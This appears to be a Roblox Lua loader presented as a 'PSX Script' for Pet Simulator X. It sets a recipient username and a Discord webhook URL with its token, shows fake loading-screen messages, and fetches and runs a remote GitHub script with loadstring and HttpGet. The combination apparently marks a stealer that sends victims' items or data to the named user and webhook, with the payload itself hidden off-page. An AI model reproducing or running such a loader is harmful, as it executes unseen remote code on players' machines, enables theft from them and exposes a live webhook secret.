Username = "GiffddWhat"
WebHook = "https://discord.com/api/webhooks/1026486775583080559/TG8DvbFYKC1q-yiOfA6TUvuN5IIWvCfIZxxfV0gwNRQ4Lr6_vd_i1xIDuR1_zVvt6zBy"


loadingscreen = true -- set this to false and remove _G. stuff to use your own GUI
_G.CustomScriptName = "PSX Script"
_G.Text1 = "Script Loaded..."
_G.Text2 = "Waiting for Script"
_G.Text3 = "Checking Scripts..."
_G.Text4 = "Starting Scripts..."
loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))()
